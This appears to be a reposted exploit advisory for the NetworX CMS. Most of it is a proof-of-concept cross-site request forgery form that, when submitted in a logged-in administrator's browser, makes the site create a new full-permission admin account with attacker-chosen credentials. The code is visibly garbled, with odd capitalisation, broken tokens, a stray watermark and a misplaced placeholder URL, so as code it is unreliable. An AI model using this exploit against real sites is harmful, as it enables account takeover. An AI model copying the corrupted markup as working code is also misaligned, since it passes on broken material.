Title: NetworX CMS-CSRF Add Admin
Author: N3t. Crack3r
Program address: http://www.socialabc.com/downloads/networx-social/
All versions affected
Test System Platform: [Ubuntu]
Demo site: http://www.socialabc.com/demo/
<! --
// ================================================ ========================================================== =
// Login info: E-mail: adm@hackw0rms.net pass: t00r
# Root @ SecBoX :~ # Cat poc. php -->
<Html>
<Head>
<Script language = "javascript">
Function country_changed ()
{
Document. getElementById ('hdnsubmited'). value = 'change _ country ';
Document. getElementById ('frmmain'). submit ();
}
</Script>
</Head>
<Form action = "http://www.bkjia.com/admin/employer. php" form method = "post" id = "frmMain">
<Input type = "hidden" name = "submited" value = "save" id = "hdnSubmited">
<Br>
<P class = "text_14 bold" align = "center"> NetworX CSRF-Add Admin </p>
<Table cellpadding = "5" border = "0">
<Tr>
<Td align = "right" class = "text_12"> Email: </td>
<Td colspan = "3">
<Input type = "text" name = "UserEmail" value = "adm@hackw0rms.net">
</Td>
</Tr>
<Tr>
<Td align = "right" class = "text_12"> Password: </td>
<Td colspan = "3">
<Input type = "password" name = "Password" value = "t00r">
</Td>
</Tr>
<Tr>
<Td align = "right" class = "text_12"> First Name: </td>
<Td> <input type = "text" name = "UserFirstname" value = "Hack" class = "t_box" style = "width: 150px;"> </td>
<Td align = "right" class = "text_12"> Last Name: </td>
<Td> <input type = "text" name = "UserLastname" value = "W0rm" class = "t_box" style = "width: 150px;"> </td>
</Tr>
<Tr> www.2cto.com
<Td align = "right" class = "text_12"> Country: </td>
<Td colspan = "3">
<Select name = "UserCountry" onchange = "country_changed ()">
<Option value = "{ID}" {selected}> United state of Islam </option>
</Select>
</Td>
</Tr>
<Tr>
<Td align = "right" class = "text_12"> Address: </td>
<Td colspan = "3">
<Input type = "text" name = "UserAddress1" value = "69 1337 st" class = "t_box" style = "width: 400px;">
</Td>
</Tr>
<Tr>
<Td align = "right" class = "text_12"> City/Town: </td>
<Td colspan = "3">
<Input type = "text" name = "UserCity" value = "system32" class = "t_box" style = "width: 200px;">
</Td>
</Tr>
<Tr>
<Td align = "right" class = "text_12"> State/Province: </td>
<Td>
<Select name = "UserState" class = "t_box" style = "width: 100px;">
<Option value = "{ID}" {selected}> LA </option>
</Select>
</Td>
<Td align = "right" class = "text_12"> Zip Code: </td>
<Td> <input type = "text" name = "UserZip" value = "31337" class = "t_box" style = "width: 100px;"> </td>
</Tr>
<Tr>
<Td align = "right" class = "text_12"> Contact Phone: </td>
<Td colspan = "3">
<Input type = "text" name = "UserPhone" value = "691337" class = "t_box" style = "width: 200px;">
</Td>
</Tr>
<Tr>
<Td rowspan = "10" valign = "top" align = "http: // <! ----- Replace hear with url ---->/admin/employer. php "class =" text_12 "> Permissions: </td>
<Td> <input type = "checkbox" name = "UserPermissions []" value = "1" class = "t_box" checked = "checked" func_if_true ({permissionmers MERs }, 'checked')> User Management Tool </td>
</Tr>
<Tr>
<Td> <input type = "checkbox" name = "UserPermissions []" value = "2" class = "t_box" checked = "checked" func_if_true ({PermissionContent }, 'checked')> Content Management Tool </td>
</Tr>
<Tr>
<Td> <input type = "checkbox" name = "UserPermissions []" value = "4" class = "t_box" checked = "checked" func_if_true ({PermissionStatistics }, 'checked')> Statistics and Reports </td>
</Tr>
<Tr>
<Td> <input type = "checkbox" name = "UserPermissions []" value = "32" class = "t_box" checked = "checked" func_if_true ({PermissionReports }, 'checked')> Complaint and Report Tool </td>
</Tr>
</Table>
<Br>
<! -- Buttons start -->
<Table width = "100%" cellpadding = "5" border = "0">
<Tr>
<Td width = "80"> </td>
<Td align = "right">
<Input type = "submit" name = "Save" value = "Save" style = "width: 80px;">
</Td>
</Tr>
</Table>
</Form>
</Html>